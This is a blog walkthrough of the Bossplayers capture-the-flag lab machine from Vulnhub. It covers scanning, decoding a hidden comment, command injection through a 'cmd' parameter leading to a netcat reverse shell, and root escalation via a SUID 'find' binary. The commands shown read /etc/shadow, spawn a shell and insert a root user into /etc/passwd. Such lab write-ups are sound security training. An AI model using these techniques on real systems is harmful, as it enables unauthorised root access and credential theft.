Bossplayers CTF - Walkthrough

Mr. Robot
Mr. Robot
Oct 4, 2019 · 5 min read

Finally, I’m back. I was doing Virtual Hacking Labs for 3 months, but I’m back now. I’ll finish my reports soon and continue solving Vulnhub and Hack The Box machines. I know, I missed many machines. I decided to start with the latest and greatest. Let’s get started!

Description from Vulnhub:

Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.

You may have issues using VMware.

Scanning

My usual Nmap scan options include script scanning, version enumeration on all ports. I got the following result back, only 2 ports were open.

I quickly checked the OpenSSH version for publicly available exploits, but I didn’t find anything. I low-key know that this version is pretty safe, but it’s a good practice to double check everything. I checked what port 80 is all about. Let’s see the robots.txt file.

Uhh, okay! That’s definetly not the way in. I went back and used the Inspect Element tools to see the site’s HTML code. Well, there was an interesting comment at the bottom of the file.

I assumed that they used base64 encoding for the comment. After decoding the text 3 times, I finally got a file name as a result.

We are slowly progressing. The page looked like some kind of to-do list for the system administrator. I focused on the unchecked items which suggested that a ping command and a privilege escalation vulnerability is probably present on the target system. It’s our job to find them.

I fired up Burp Suite to capture the request and find this misterious ping command. I have to admit, this was the hardest part for me. It included a lot of guess work. I tried ping , ip , command and similar PHP parameters. Finally, I tried cmd and it worked! I got back the result of the id command in the response. I didn't even have to use an IP address.

My next move was to get a reverse shell out of this remote code execution. I chose the simplest netcat reverse shell command. Note that, you have to URL encode your command otherwise it won’t work. No response, good sign!

‌Sure enough, I got a connection back on my reverse shell listener as a low-privileged user www-data.

Privilege Escalation‌

It was time for more enumeration. I usually run some basic commands before doing an extensive enumeration with shell scripts. I look for sensitive files, check permissions, list the allowed (and forbidden) commands for the invoking user etc… Actually, I wasn’t able to do the last one because the sudo command is not installed on the system. On the other hand, I listed SUID bit set files and noticed a command that should not be there. The find command had SUID and GUID bit set which very very bad.

We can’t use the sudo find . -exec /bin/bash \; command to spawn a root shell, we have to be more clever than that. The find command has the ability to execute linux commands on files that match the search criteria. Let me show you what I mean. We can read the /etc/shadow file that is owned by the root user.

Basically, we already have root privileges. That’s why I didn’t try to crack the hashes. My idea was to add a new user /entry to the /etc/passwd file with root privileges. Note that, I'm still using a pseudo TTY which made this significantly harder. Sometimes, you don't have the opportunity or time to upgrade your shell. First of all, I created a salted password hash with perl . I chose supersecret for the password and salt for the salt. On the following screenshot, you can also see the complete line for the new r00t user.

I couldn’t screenshot the steps (lots of garbage output), so I try to explain the process. First, I executed the find /etc -name passwd -exec vi {} \;command which opened a file that is not the /etc/passwd file. You might ask, whaat?! The reason behind this is that find searched recursively be default and I couldn't prevent this on the target system. So, the previous command opened /etc/cron.daily/passwdand /etc/pam.d/passwdbefore /etc/passwd . They unfortunately matched the searched criteria. I just typed :q 2 times to close the first 2 file. After that, I hit i to enter into INSERT mode and pasted my new crafted user line + hit again and closed the file with the :wq! command. If you know vi this is nothing new to you. Let's see the new entry in the /etc/passwd file.

We did it! We have our user at the top of the file. All we have to do is switch to this user using the previously set supersecret password. Now, we have root privileges and with that full system compromise. Finally, I printed out the flag which was also base64 encoded.


Before You Go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏

InfoSec Adventures

Adventures in the world of IT Security.

Mr. Robot

Written by

Mr. Robot

Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.

InfoSec Adventures

Adventures in the world of IT Security.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade